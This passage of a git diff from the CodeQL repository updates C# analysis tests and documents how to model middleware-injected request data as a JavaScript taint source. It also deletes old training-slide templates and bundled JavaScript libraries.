| -| IntGetHashCode.cs:10:9:10:36 | call to method GetHashCode | Calling GetHashCode() on type short is redundant. | -| IntGetHashCode.cs:11:9:11:37 | call to method GetHashCode | Calling GetHashCode() on type ushort is redundant. | -| IntGetHashCode.cs:12:9:12:35 | call to method GetHashCode | Calling GetHashCode() on type byte is redundant. | -| IntGetHashCode.cs:13:9:13:36 | call to method GetHashCode | Calling GetHashCode() on type sbyte is redundant. | +| IntGetHashCode.cs:6:9:6:34 | call to method GetHashCode | Calling GetHashCode() on type int is redundant. | +| IntGetHashCode.cs:7:9:7:36 | call to method GetHashCode | Calling GetHashCode() on type short is redundant. | +| IntGetHashCode.cs:8:9:8:37 | call to method GetHashCode | Calling GetHashCode() on type ushort is redundant. | +| IntGetHashCode.cs:9:9:9:35 | call to method GetHashCode | Calling GetHashCode() on type byte is redundant. | +| IntGetHashCode.cs:10:9:10:36 | call to method GetHashCode | Calling GetHashCode() on type sbyte is redundant. | diff --git a/csharp/ql/test/query-tests/Useless Code/IntGetHashCode/IntGetHashCode.qlref b/csharp/ql/test/query-tests/Useless Code/IntGetHashCode/IntGetHashCode.qlref index a2aedb412274..710cdadee824 100644 --- a/csharp/ql/test/query-tests/Useless Code/IntGetHashCode/IntGetHashCode.qlref +++ b/csharp/ql/test/query-tests/Useless Code/IntGetHashCode/IntGetHashCode.qlref @@ -1 +1,2 @@ -Useless code/IntGetHashCode.ql \ No newline at end of file +query: Useless code/IntGetHashCode.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/standalone/Bad Practices/Control-Flow/ConstantCondition/ConstantCondition.cs b/csharp/ql/test/query-tests/standalone/Bad Practices/Control-Flow/ConstantCondition/ConstantCondition.cs new file mode 100644 index 000000000000..6f40759b3e67 --- /dev/null +++ b/csharp/ql/test/query-tests/standalone/Bad Practices/Control-Flow/ConstantCondition/ConstantCondition.cs @@ -0,0 +1,27 @@ +using System; + +partial class C1 +{ + public C2 Prop { get; set; } +} + +class C2 { } + +class ConstantMatching +{ + void M1() + { + var c1 = new C1(); + if (c1.Prop is int) // $ Alert + { + } + + // Should not be considered a constant condition as + // we don't know anything about D. + var d = new D(); + if (d.Prop is C2) + { + } + } +} + diff --git a/csharp/ql/test/query-tests/standalone/Bad Practices/Control-Flow/ConstantCondition/ConstantCondition.expected b/csharp/ql/test/query-tests/standalone/Bad Practices/Control-Flow/ConstantCondition/ConstantCondition.expected new file mode 100644 index 000000000000..25ed39bebb72 --- /dev/null +++ b/csharp/ql/test/query-tests/standalone/Bad Practices/Control-Flow/ConstantCondition/ConstantCondition.expected @@ -0,0 +1,2 @@ +| ConstantCondition.cs:15:13:15:26 | ... is ... | Condition always evaluates to 'false'. | +| ConstantCondition.cs:15:24:15:26 | access to type Int32 | Pattern never matches. | diff --git a/csharp/ql/test/query-tests/standalone/Bad Practices/Control-Flow/ConstantCondition/ConstantCondition.qlref b/csharp/ql/test/query-tests/standalone/Bad Practices/Control-Flow/ConstantCondition/ConstantCondition.qlref new file mode 100644 index 000000000000..6692217230e0 --- /dev/null +++ b/csharp/ql/test/query-tests/standalone/Bad Practices/Control-Flow/ConstantCondition/ConstantCondition.qlref @@ -0,0 +1,2 @@ +query: Bad Practices/Control-Flow/ConstantCondition.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/csharp/ql/test/query-tests/standalone/ObjectComparison/options b/csharp/ql/test/query-tests/standalone/Bad Practices/Control-Flow/ConstantCondition/options similarity index 100% rename from csharp/ql/test/query-tests/standalone/ObjectComparison/options rename to csharp/ql/test/query-tests/standalone/Bad Practices/Control-Flow/ConstantCondition/options diff --git a/csharp/ql/test/query-tests/standalone/IncomparableEquals/IncomparableEquals.cs b/csharp/ql/test/query-tests/standalone/Likely Bugs/IncomparableEquals/IncomparableEquals.cs similarity index 100% rename from csharp/ql/test/query-tests/standalone/IncomparableEquals/IncomparableEquals.cs rename to csharp/ql/test/query-tests/standalone/Likely Bugs/IncomparableEquals/IncomparableEquals.cs diff --git a/csharp/ql/test/query-tests/standalone/IncomparableEquals/IncomparableEquals.expected b/csharp/ql/test/query-tests/standalone/Likely Bugs/IncomparableEquals/IncomparableEquals.expected similarity index 100% rename from csharp/ql/test/query-tests/standalone/IncomparableEquals/IncomparableEquals.expected rename to csharp/ql/test/query-tests/standalone/Likely Bugs/IncomparableEquals/IncomparableEquals.expected diff --git a/csharp/ql/test/query-tests/standalone/IncomparableEquals/IncomparableEquals.qlref b/csharp/ql/test/query-tests/standalone/Likely Bugs/IncomparableEquals/IncomparableEquals.qlref similarity index 100% rename from csharp/ql/test/query-tests/standalone/IncomparableEquals/IncomparableEquals.qlref rename to csharp/ql/test/query-tests/standalone/Likely Bugs/IncomparableEquals/IncomparableEquals.qlref diff --git a/csharp/ql/test/query-tests/standalone/Likely Bugs/IncomparableEquals/options b/csharp/ql/test/query-tests/standalone/Likely Bugs/IncomparableEquals/options new file mode 100644 index 000000000000..7ba3811b2afb --- /dev/null +++ b/csharp/ql/test/query-tests/standalone/Likely Bugs/IncomparableEquals/options @@ -0,0 +1 @@ +semmle-extractor-options: --standalone diff --git a/csharp/ql/test/query-tests/standalone/ObjectComparison/ObjectComparison.cs b/csharp/ql/test/query-tests/standalone/Likely Bugs/ObjectComparison/ObjectComparison.cs similarity index 100% rename from csharp/ql/test/query-tests/standalone/ObjectComparison/ObjectComparison.cs rename to csharp/ql/test/query-tests/standalone/Likely Bugs/ObjectComparison/ObjectComparison.cs diff --git a/csharp/ql/test/query-tests/standalone/ObjectComparison/ObjectComparison.expected b/csharp/ql/test/query-tests/standalone/Likely Bugs/ObjectComparison/ObjectComparison.expected similarity index 100% rename from csharp/ql/test/query-tests/standalone/ObjectComparison/ObjectComparison.expected rename to csharp/ql/test/query-tests/standalone/Likely Bugs/ObjectComparison/ObjectComparison.expected diff --git a/csharp/ql/test/query-tests/standalone/ObjectComparison/ObjectComparison.qlref b/csharp/ql/test/query-tests/standalone/Likely Bugs/ObjectComparison/ObjectComparison.qlref similarity index 100% rename from csharp/ql/test/query-tests/standalone/ObjectComparison/ObjectComparison.qlref rename to csharp/ql/test/query-tests/standalone/Likely Bugs/ObjectComparison/ObjectComparison.qlref diff --git a/csharp/ql/test/query-tests/standalone/Likely Bugs/ObjectComparison/options b/csharp/ql/test/query-tests/standalone/Likely Bugs/ObjectComparison/options new file mode 100644 index 000000000000..7ba3811b2afb --- /dev/null +++ b/csharp/ql/test/query-tests/standalone/Likely Bugs/ObjectComparison/options @@ -0,0 +1 @@ +semmle-extractor-options: --standalone diff --git a/csharp/ql/test/utils/modelgenerator/dataflow/Summaries.cs b/csharp/ql/test/utils/modelgenerator/dataflow/Summaries.cs index 2d8bbc8912bc..7a6f16f383e5 100644 --- a/csharp/ql/test/utils/modelgenerator/dataflow/Summaries.cs +++ b/csharp/ql/test/utils/modelgenerator/dataflow/Summaries.cs @@ -1034,3 +1034,40 @@ public override object GetValue() } } } + +public class ParameterModifiers +{ + // contentbased-summary=Models;ParameterModifiers;false;Copy;(System.Object,System.Object);;Argument[0];Argument[1];value;dfc-generated + // summary=Models;ParameterModifiers;false;Copy;(System.Object,System.Object);;Argument[0];Argument[1];taint;df-generated + public void Copy(object key, out object value) + { + value = key; + } + + // contentbased-summary=Models;ParameterModifiers;false;CopyToRef;(System.Object,System.Object);;Argument[0];Argument[1];value;dfc-generated + // summary=Models;ParameterModifiers;false;CopyToRef;(System.Object,System.Object);;Argument[0];Argument[1];taint;df-generated + public void CopyToRef(object key, ref object value) + { + value = key; + } + + // No summaries as we disregard flow from a parameter to itself. + // neutral=Models;ParameterModifiers;RefParamFlowToSelf;(System.Object,System.Boolean);summary;df-generated + public void RefParamFlowToSelf(ref object value, bool b) + { + value = b ? value : null; + } + + // neutral=Models;ParameterModifiers;RefParamUse;(System.Object);summary;df-generated + public void RefParamUse(ref object value) + { + var b = value is null; + } + + // contentbased-summary=Models;ParameterModifiers;false;InReturn;(System.Object);;Argument[0];ReturnValue;value;dfc-generated + // summary=Models;ParameterModifiers;false;InReturn;(System.Object);;Argument[0];ReturnValue;taint;df-generated + public object InReturn(in object v) + { + return v; + } +} diff --git a/docs/codeql/codeql-language-guides/customizing-library-models-for-javascript.rst b/docs/codeql/codeql-language-guides/customizing-library-models-for-javascript.rst index b4a3446e942f..fa2c1d4e8a82 100644 --- a/docs/codeql/codeql-language-guides/customizing-library-models-for-javascript.rst +++ b/docs/codeql/codeql-language-guides/customizing-library-models-for-javascript.rst @@ -349,6 +349,48 @@ Note that this flow is already recognized by the CodeQL JS analysis, but for thi - The last column, **value**, indicates the kind of flow to add. The value **value** means the input value is unchanged as it flows to the output. + +Example: Modeling properties injected by a middleware function +-------------------------------------------------------------- + +In this example, we'll show how to model a hypothetical middleware function that adds a tainted value +on the incoming request objects: + +.. code-block:: js + + const express = require('express') + const app = express() + + app.use(require('@example/middleware').injectData()) + + app.get('/foo', (req, res) => { + req.data; // <-- mark 'req.data' as a taint source + }); + +This can be achieved with the following data extension: + +.. code-block:: yaml + + extensions: + - addsTo: + pack: codeql/javascript-all + extensible: sourceModel + data: + - [ + "@example/middleware", + "Member[injectData].ReturnValue.GuardedRouteHandler.Parameter[0].Member[data]", + "remote", + ] + +- Since we're adding a new taint source, we add a tuple to the **sourceModel** extensible predicate. +- The first column, **"@example/middleware"**, begins the search at imports of the hypothetical NPM package **@example/middleware**. +- **Member[injectData]** selects accesses to the **injectData** member. +- **ReturnValue** selects the return value of the call to **injectData**. +- **GuardedRouteHandler** interprets the current value as a middleware function and selects all route handlers guarded by that middleware. Since the current value is passd to **app.use()**, the callback subsequently passed to **app.get()** is seen as a guarded route handler. +- **Parameter[0]** selects the first parameter of the callback (the parameter named **req**). +- **Member[data]** selects accesses to the **data** property of the **req** object. +- Finally, the kind **remote** indicates that this is considered a source of remote flow. + Reference material ------------------ @@ -494,6 +536,12 @@ Components related to decorators: - **DecoratedParameter** selects a parameter that is decorated by the current value. - **DecoratedMember** selects a method, field, or accessor that is decorated by the current value. +Additionally there is a component related to middleware functions: + +- **GuardedRouteHandler** interprets the current value as a middleware function, and selects any route handler function that comes after it in the routing hierarchy. + This can be used to model properties injected onto request and response objects, such as **req.db** after a middleware that injects a database connection. + Note that this currently over-approximates the set of route handlers but may be made more accurate in the future. + Additional notes about the syntax of operands: - Multiple operands may be given to a single component, as a shorthand for the union of the operands. For example, **Member[foo,bar]** matches the union of **Member[foo]** and **Member[bar]**. diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/end_slide.html b/docs/codeql/ql-training/_static-training/slides-semmle-2/end_slide.html deleted file mode 100644 index dd35aec615c9..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/end_slide.html +++ /dev/null @@ -1,5 +0,0 @@ - -
    -
    -     - \ No newline at end of file diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/layout.html b/docs/codeql/ql-training/_static-training/slides-semmle-2/layout.html deleted file mode 100644 index fb5d7a28416a..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/layout.html +++ /dev/null @@ -1,182 +0,0 @@ - -{%- block doctype -%} - -{%- endblock %} - -{%- set reldelim1 = reldelim1 is not defined and ' »' or reldelim1 %} -{%- set reldelim2 = reldelim2 is not defined and ' |' or reldelim2 %} -{%- set render_sidebar = (not embedded) and (not theme_nosidebar|tobool) and - (sidebars != []) %} -{%- set url_root = pathto('', 1) %} -{# XXX necessary? #} -{%- if url_root == '#' %}{% set url_root = '' %}{% endif %} -{%- if not embedded and docstitle %} - {%- set titlesuffix = " — "|safe + docstitle|e %} -{%- else %} - {%- set titlesuffix = "" %} -{%- endif %} - -{%- macro relbar() %} -{%- endmacro %} - -{%- macro sidebar() %} -{%- endmacro %} - -{%- macro script() %} - - - - - {%- for scriptfile in script_files %} - - {%- endfor %} - {% if theme_custom_js %} - - {% endif %} - -{%- endmacro %} - -{%- macro css() %} - - - - - - {% if theme_custom_css %} - - {% endif %} - - {%- for cssfile in css_files %} - - {%- endfor %} -{%- endmacro %} - - - - {%- block htmltitle %} - {{ title|striptags|e }}{{ titlesuffix }} - {%- endblock %} - - {{ metatags }} - - - - - - - - - - - - - - {{ css() }} - - {%- if not embedded %} - {{ script() }} - {%- if use_opensearch %} - - {%- endif %} - {%- if favicon %} - - {%- endif %} - {%- endif %} -{%- block linktags %} - {%- if hasdoc('about') %} - - {%- endif %} - {%- if hasdoc('genindex') %} - - {%- endif %} - {%- if hasdoc('search') %} - - {%- endif %} - {%- if hasdoc('copyright') %} - - {%- endif %} - - {%- if parents %} - - {%- endif %} - {%- if next %} - - {%- endif %} - {%- if prev %} - - {%- endif %} -{%- endblock %} -{%- block extrahead %} - - -{% endblock %} - - - - - - - - {% block body %}{% endblock %} - - {% include "end_slide.html" %} - - - - - - - - - - - - diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/slide.html b/docs/codeql/ql-training/_static-training/slides-semmle-2/slide.html deleted file mode 100644 index e304d9580992..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/slide.html +++ /dev/null @@ -1,19 +0,0 @@ - - -
    - {{ title }} -
    - -
    - - {{ content }} - - -{% if config.slide_numbers %} -
    {{ slide_number }}
    -{% endif %} -{% if config.slide_footer %} -
    {{ config.slide_footer }}
    -{% endif %} -
    -     diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/config.rb b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/config.rb deleted file mode 100644 index e435e43a0bb9..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/config.rb +++ /dev/null @@ -1,24 +0,0 @@ -# Require any additional compass plugins here. - -# Set this to the root of your project when deployed: -http_path = "/" -css_dir = "theme/css" -sass_dir = "theme/scss" -images_dir = "images" -javascripts_dir = "js" - -# You can select your preferred output style here (can be overridden via the command line): -output_style = :expanded #:expanded or :nested or :compact or :compressed - -# To enable relative paths to assets via compass helper functions. Uncomment: -# relative_assets = true - -# To disable debugging comments that display the original location of your selectors. Uncomment: -# line_comments = false - - -# If you prefer the indented syntax, you might want to regenerate this -# project again passing --syntax sass, or you can uncomment this: -# preferred_syntax = :sass -# and then run: -# sass-convert -R --from scss --to sass sass scss && rm -rf sass && mv scss sass diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/hammer.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/hammer.js deleted file mode 100644 index 44a5802e56bb..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/hammer.js +++ /dev/null @@ -1,586 +0,0 @@ -/* - * Hammer.JS - * version 0.4 - * author: Eight Media - * https://github.com/EightMedia/hammer.js - */ -function Hammer(element, options, undefined) -{ - var self = this; - - var defaults = { - // prevent the default event or not... might be buggy when false - prevent_default : false, - css_hacks : true, - - drag : true, - drag_vertical : true, - drag_horizontal : true, - // minimum distance before the drag event starts - drag_min_distance : 20, // pixels - - // pinch zoom and rotation - transform : true, - scale_treshold : 0.1, - rotation_treshold : 15, // degrees - - tap : true, - tap_double : true, - tap_max_interval : 300, - tap_double_distance: 20, - - hold : true, - hold_timeout : 500 - }; - options = mergeObject(defaults, options); - - // some css hacks - (function() { - if(!options.css_hacks) { - return false; - } - - var vendors = ['webkit','moz','ms','o','']; - var css_props = { - "userSelect": "none", - "touchCallout": "none", - "userDrag": "none", - "tapHighlightColor": "rgba(0,0,0,0)" - }; - - var prop = ''; - for(var i = 0; i < vendors.length; i++) { - for(var p in css_props) { - prop = p; - if(vendors[i]) { - prop = vendors[i] + prop.substring(0, 1).toUpperCase() + prop.substring(1); - } - element.style[ prop ] = css_props[p]; - } - } - })(); - - // holds the distance that has been moved - var _distance = 0; - - // holds the exact angle that has been moved - var _angle = 0; - - // holds the diraction that has been moved - var _direction = 0; - - // holds position movement for sliding - var _pos = { }; - - // how many fingers are on the screen - var _fingers = 0; - - var _first = false; - - var _gesture = null; - var _prev_gesture = null; - - var _touch_start_time = null; - var _prev_tap_pos = {x: 0, y: 0}; - var _prev_tap_end_time = null; - - var _hold_timer = null; - - var _offset = {}; - - // keep track of the mouse status - var _mousedown = false; - - var _event_start; - var _event_move; - var _event_end; - - - /** - * angle to direction define - * @param float angle - * @return string direction - */ - this.getDirectionFromAngle = function( angle ) - { - var directions = { - down: angle >= 45 && angle < 135, //90 - left: angle >= 135 || angle <= -135, //180 - up: angle < -45 && angle > -135, //270 - right: angle >= -45 && angle <= 45 //0 - }; - - var direction, key; - for(key in directions){ - if(directions[key]){ - direction = key; - break; - } - } - return direction; - }; - - - /** - * count the number of fingers in the event - * when no fingers are detected, one finger is returned (mouse pointer) - * @param event - * @return int fingers - */ - function countFingers( event ) - { - // there is a bug on android (until v4?) that touches is always 1, - // so no multitouch is supported, e.g. no, zoom and rotation... - return event.touches ? event.touches.length : 1; - } - - - /** - * get the x and y positions from the event object - * @param event - * @return array [{ x: int, y: int }] - */ - function getXYfromEvent( event ) - { - event = event || window.event; - - // no touches, use the event pageX and pageY - if(!event.touches) { - var doc = document, - body = doc.body; - - return [{ - x: event.pageX || event.clientX + ( doc && doc.scrollLeft || body && body.scrollLeft || 0 ) - ( doc && doc.clientLeft || body && doc.clientLeft || 0 ), - y: event.pageY || event.clientY + ( doc && doc.scrollTop || body && body.scrollTop || 0 ) - ( doc && doc.clientTop || body && doc.clientTop || 0 ) - }]; - } - // multitouch, return array with positions - else { - var pos = [], src; - for(var t=0, len=event.touches.length; t options.drag_min_distance) || _gesture == 'drag') { - // calculate the angle - _angle = getAngle(_pos.start[0], _pos.move[0]); - _direction = self.getDirectionFromAngle(_angle); - - // check the movement and stop if we go in the wrong direction - var is_vertical = (_direction == 'up' || _direction == 'down'); - if(((is_vertical && !options.drag_vertical) || (!is_vertical && !options.drag_horizontal)) - && (_distance > options.drag_min_distance)) { - return; - } - - _gesture = 'drag'; - - var position = { x: _pos.move[0].x - _offset.left, - y: _pos.move[0].y - _offset.top }; - - var event_obj = { - originalEvent : event, - position : position, - direction : _direction, - distance : _distance, - distanceX : _distance_x, - distanceY : _distance_y, - angle : _angle - }; - - // on the first time trigger the start event - if(_first) { - triggerEvent("dragstart", event_obj); - - _first = false; - } - - // normal slide event - triggerEvent("drag", event_obj); - - cancelEvent(event); - } - }, - - - // transform gesture - // fired on touchmove - transform : function(event) - { - if(options.transform) { - var scale = event.scale || 1; - var rotation = event.rotation || 0; - - if(countFingers(event) != 2) { - return false; - } - - if(_gesture != 'drag' && - (_gesture == 'transform' || Math.abs(1-scale) > options.scale_treshold - || Math.abs(rotation) > options.rotation_treshold)) { - _gesture = 'transform'; - - _pos.center = { x: ((_pos.move[0].x + _pos.move[1].x) / 2) - _offset.left, - y: ((_pos.move[0].y + _pos.move[1].y) / 2) - _offset.top }; - - var event_obj = { - originalEvent : event, - position : _pos.center, - scale : scale, - rotation : rotation - }; - - // on the first time trigger the start event - if(_first) { - triggerEvent("transformstart", event_obj); - _first = false; - } - - triggerEvent("transform", event_obj); - - cancelEvent(event); - - return true; - } - } - - return false; - }, - - - // tap and double tap gesture - // fired on touchend - tap : function(event) - { - // compare the kind of gesture by time - var now = new Date().getTime(); - var touch_time = now - _touch_start_time; - - // dont fire when hold is fired - if(options.hold && !(options.hold && options.hold_timeout > touch_time)) { - return; - } - - // when previous event was tap and the tap was max_interval ms ago - var is_double_tap = (function(){ - if (_prev_tap_pos && options.tap_double && _prev_gesture == 'tap' && (_touch_start_time - _prev_tap_end_time) < options.tap_max_interval) { - var x_distance = Math.abs(_prev_tap_pos[0].x - _pos.start[0].x); - var y_distance = Math.abs(_prev_tap_pos[0].y - _pos.start[0].y); - return (_prev_tap_pos && _pos.start && Math.max(x_distance, y_distance) < options.tap_double_distance); - - } - return false; - })(); - - if(is_double_tap) { - _gesture = 'double_tap'; - _prev_tap_end_time = null; - - triggerEvent("doubletap", { - originalEvent : event, - position : _pos.start - }); - cancelEvent(event); - } - - // single tap is single touch - else { - _gesture = 'tap'; - _prev_tap_end_time = now; - _prev_tap_pos = _pos.start; - - if(options.tap) { - triggerEvent("tap", { - originalEvent : event, - position : _pos.start - }); - cancelEvent(event); - } - } - - } - - }; - - - function handleEvents(event) - { - switch(event.type) - { - case 'mousedown': - case 'touchstart': - _pos.start = getXYfromEvent(event); - _touch_start_time = new Date().getTime(); - _fingers = countFingers(event); - _first = true; - _event_start = event; - - // borrowed from jquery offset https://github.com/jquery/jquery/blob/master/src/offset.js - var box = element.getBoundingClientRect(); - var clientTop = element.clientTop || document.body.clientTop || 0; - var clientLeft = element.clientLeft || document.body.clientLeft || 0; - var scrollTop = window.pageYOffset || element.scrollTop || document.body.scrollTop; - var scrollLeft = window.pageXOffset || element.scrollLeft || document.body.scrollLeft; - - _offset = { - top: box.top + scrollTop - clientTop, - left: box.left + scrollLeft - clientLeft - }; - - _mousedown = true; - - // hold gesture - gestures.hold(event); - - if(options.prevent_default) { - cancelEvent(event); - } - break; - - case 'mousemove': - case 'touchmove': - if(!_mousedown) { - return false; - } - _event_move = event; - _pos.move = getXYfromEvent(event); - - if(!gestures.transform(event)) { - gestures.drag(event); - } - break; - - case 'mouseup': - case 'mouseout': - case 'touchcancel': - case 'touchend': - if(!_mousedown || (_gesture != 'transform' && event.touches && event.touches.length > 0)) { - return false; - } - - _mousedown = false; - _event_end = event; - - // drag gesture - // dragstart is triggered, so dragend is possible - if(_gesture == 'drag') { - triggerEvent("dragend", { - originalEvent : event, - direction : _direction, - distance : _distance, - angle : _angle - }); - } - - // transform - // transformstart is triggered, so transformed is possible - else if(_gesture == 'transform') { - triggerEvent("transformend", { - originalEvent : event, - position : _pos.center, - scale : event.scale, - rotation : event.rotation - }); - } - else { - gestures.tap(_event_start); - } - - _prev_gesture = _gesture; - - // reset vars - reset(); - break; - } - } - - - // bind events for touch devices - // except for windows phone 7.5, it doesnt support touch events..! - if('ontouchstart' in window) { - element.addEventListener("touchstart", handleEvents, false); - element.addEventListener("touchmove", handleEvents, false); - element.addEventListener("touchend", handleEvents, false); - element.addEventListener("touchcancel", handleEvents, false); - } - // for non-touch - else { - - if(element.addEventListener){ // prevent old IE errors - element.addEventListener("mouseout", function(event) { - if(!isInsideHammer(element, event.relatedTarget)) { - handleEvents(event); - } - }, false); - element.addEventListener("mouseup", handleEvents, false); - element.addEventListener("mousedown", handleEvents, false); - element.addEventListener("mousemove", handleEvents, false); - - // events for older IE - }else if(document.attachEvent){ - element.attachEvent("onmouseout", function(event) { - if(!isInsideHammer(element, event.relatedTarget)) { - handleEvents(event); - } - }, false); - element.attachEvent("onmouseup", handleEvents); - element.attachEvent("onmousedown", handleEvents); - element.attachEvent("onmousemove", handleEvents); - } - } - - - /** - * find if element is (inside) given parent element - * @param object element - * @param object parent - * @return bool inside - */ - function isInsideHammer(parent, child) { - // get related target for IE - if(!child && window.event && window.event.toElement){ - child = window.event.toElement; - } - - if(parent === child){ - return true; - } - - // loop over parentNodes of child until we find hammer element - if(child){ - var node = child.parentNode; - while(node !== null){ - if(node === parent){ - return true; - }; - node = node.parentNode; - } - } - return false; - } - - - /** - * merge 2 objects into a new object - * @param object obj1 - * @param object obj2 - * @return object merged object - */ - function mergeObject(obj1, obj2) { - var output = {}; - - if(!obj2) { - return obj1; - } - - for (var prop in obj1) { - if (prop in obj2) { - output[prop] = obj2[prop]; - } else { - output[prop] = obj1[prop]; - } - } - return output; - } - - function isFunction( obj ){ - return Object.prototype.toString.call( obj ) == "[object Function]"; - } -} \ No newline at end of file diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/modernizr.custom.45394.js b/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/modernizr.custom.45394.js deleted file mode 100644 index 26f38cdcc529..000000000000 --- a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/modernizr.custom.45394.js +++ /dev/null @@ -1,4 +0,0 @@ -/* Modernizr 2.5.3 (Custom Build) | MIT & BSD - * Build: http://www.modernizr.com/download/#-fontface-backgroundsize-borderimage-borderradius-boxshadow-flexbox-flexbox_legacy-hsla-multiplebgs-opacity-rgba-textshadow-cssanimations-csscolumns-generatedcontent-cssgradients-cssreflections-csstransforms-csstransforms3d-csstransitions-applicationcache-canvas-canvastext-draganddrop-hashchange-history-audio-video-indexeddb-input-inputtypes-localstorage-postmessage-sessionstorage-websockets-websqldatabase-webworkers-geolocation-inlinesvg-smil-svg-svgclippaths-touch-webgl-mq-prefixed-teststyles-testprop-testallprops-hasevent-prefixes-domprefixes-load - */ -;window.Modernizr=function(a,b,c){function C(a){i.cssText=a}function D(a,b){return C(m.join(a+";")+(b||""))}function E(a,b){return typeof a===b}function F(a,b){return!!~(""+a).indexOf(b)}function G(a,b){for(var d in a)if(i[a[d]]!==c)return b=="pfx"?a[d]:!0;return!1}function H(a,b,d){for(var e in a){var f=b[a[e]];if(f!==c)return d===!1?a[e]:E(f,"function")?f.bind(d||b):f}return!1}function I(a,b,c){var d=a.charAt(0).toUpperCase()+a.substr(1),e=(a+" "+o.join(d+" ")+d).split(" ");return E(b,"string")||E(b,"undefined")?G(e,b):(e=(a+" "+p.join(d+" ")+d).split(" "),H(e,b,c))}function K(){e.input=function(c){for(var d=0,e=c.length;d",a,""].join(""),k.id=g,(l?k:m).innerHTML+=h,m.appendChild(k),l||(m.style.background="",f.appendChild(m)),i=c(k,a),l?k.parentNode.removeChild(k):m.parentNode.removeChild(m),!!i},y=function(b){var c=a.matchMedia||a.msMatchMedia;if(c)return c(b).matches;var d;return x("@media "+b+" { #"+g+" { position: absolute; } }",function(b){d=(a.getComputedStyle?getComputedStyle(b,null):b.currentStyle)["position"]=="absolute"}),d},z=function(){function d(d,e){e=e||b.createElement(a[d]||"div"),d="on"+d;var f=d in e;return f||(e.setAttribute||(e=b.createElement("div")),e.setAttribute&&e.removeAttribute&&(e.setAttribute(d,""),f=E(e[d],"function"),E(e[d],"undefined")||(e[d]=c),e.removeAttribute(d))),e=null,f}var a={select:"input",change:"input",submit:"form",reset:"form",error:"img",load:"img",abort:"img"};return d}(),A={}.hasOwnProperty,B;!E(A,"undefined")&&!E(A.call,"undefined")?B=function(a,b){return A.call(a,b)}:B=function(a,b){return b in a&&E(a.constructor.prototype[b],"undefined")},Function.prototype.bind||(Function.prototype.bind=function(b){var c=this;if(typeof c!="function")throw new TypeError;var d=v.call(arguments,1),e=function(){if(this instanceof e){var a=function(){};a.prototype=c.prototype;var f=new a,g=c.apply(f,d.concat(v.call(arguments)));return Object(g)===g?g:f}return c.apply(b,d.concat(v.call(arguments)))};return e});var J=function(c,d){var f=c.join(""),g=d.length;x(f,function(c,d){var f=b.styleSheets[b.styleSheets.length-1],h=f?f.cssRules&&f.cssRules[0]?f.cssRules[0].cssText:f.cssText||"":"",i=c.childNodes,j={};while(g--)j[i[g].id]=i[g];e.touch="ontouchstart"in a||a.DocumentTouch&&b instanceof DocumentTouch||(j.touch&&j.touch.offsetTop)===9,e.csstransforms3d=(j.csstransforms3d&&j.csstransforms3d.offsetLeft)===9&&j.csstransforms3d.offsetHeight===3,e.generatedcontent=(j.generatedcontent&&j.generatedcontent.offsetHeight)>=1,e.fontface=/src/i.test(h)&&h.indexOf(d.split(" ")[0])===0},g,d)}(['@font-face {font-family:"font";src:url("https://")}',["@media (",m.join("touch-enabled),("),g,")","{#touch{top:9px;position:absolute}}"].join(""),["@media (",m.join("transform-3d),("),g,")","{#csstransforms3d{left:9px;position:absolute;height:3px;}}"].join(""),['#generatedcontent:after{content:"',k,'";visibility:hidden}'].join("")],["fontface","touch","csstransforms3d","generatedcontent"]);r.flexbox=function(){return I("flexOrder")},r["flexbox-legacy"]=function(){return I("boxDirection")},r.canvas=function(){var a=b.createElement("canvas");return!!a.getContext&&!!a.getContext("2d")},r.canvastext=function(){return!!e.canvas&&!!E(b.createElement("canvas").getContext("2d").fillText,"function")},r.webgl=function(){try{var d=b.createElement("canvas"),e;e=!(!a.WebGLRenderingContext||!d.getContext("experimental-webgl")&&!d.getContext("webgl")),d=c}catch(f){e=!1}return e},r.touch=function(){return e.touch},r.geolocation=function(){return!!navigator.geolocation},r.postmessage=function(){return!!a.postMessage},r.websqldatabase=function(){return!!a.openDatabase},r.indexedDB=function(){return!!I("indexedDB",a)},r.hashchange=function(){return z("hashchange",a)&&(b.documentMode===c||b.documentMode>7)},r.history=function(){return!!a.history&&!!history.pushState},r.draganddrop=function(){var a=b.createElement("div");return"draggable"in a||"ondragstart"in a&&"ondrop"in a},r.websockets=function(){for(var b=-1,c=o.length;++b0&&g.splice(0,a);setTimeout(function(){b.parentNode.removeChild(b)},15)}}function m(a){var b,c;a.setAttribute("data-orderloaded","loaded");for(a=0;c=h[a];a++)if((b=i[c])&&b.getAttribute("data-orderloaded")==="loaded")delete i[c],require.addScriptToDom(b);else break;a>0&&h.splice(0, -a)}var f=typeof document!=="undefined"&&typeof window!=="undefined"&&document.createElement("script"),n=f&&(f.async||window.opera&&Object.prototype.toString.call(window.opera)==="[object Opera]"||"MozAppearance"in document.documentElement.style),o=f&&f.readyState==="uninitialized",l=/^(complete|loaded)$/,g=[],j={},i={},h=[],f=null;define({version:"1.0.5",load:function(a,b,c,e){var d;b.nameToUrl?(d=b.nameToUrl(a,null),require.s.skipAsync[d]=!0,n||e.isBuild?b([a],c):o?(e=require.s.contexts._,!e.urlFetched[d]&& -!e.loaded[a]&&(e.urlFetched[d]=!0,require.resourcesReady(!1),e.scriptCount+=1,d=require.attach(d,e,a,null,null,m),i[a]=d,h.push(a)),b([a],c)):b.specified(a)?b([a],c):(g.push({name:a,req:b,onLoad:c}),require.attach(d,null,a,k,"script/cache"))):b([a],c)}})})(); diff --git a/docs/codeql/ql-training/_static-training/slides-semmle-2/static/js/polyfills/classList.min.js 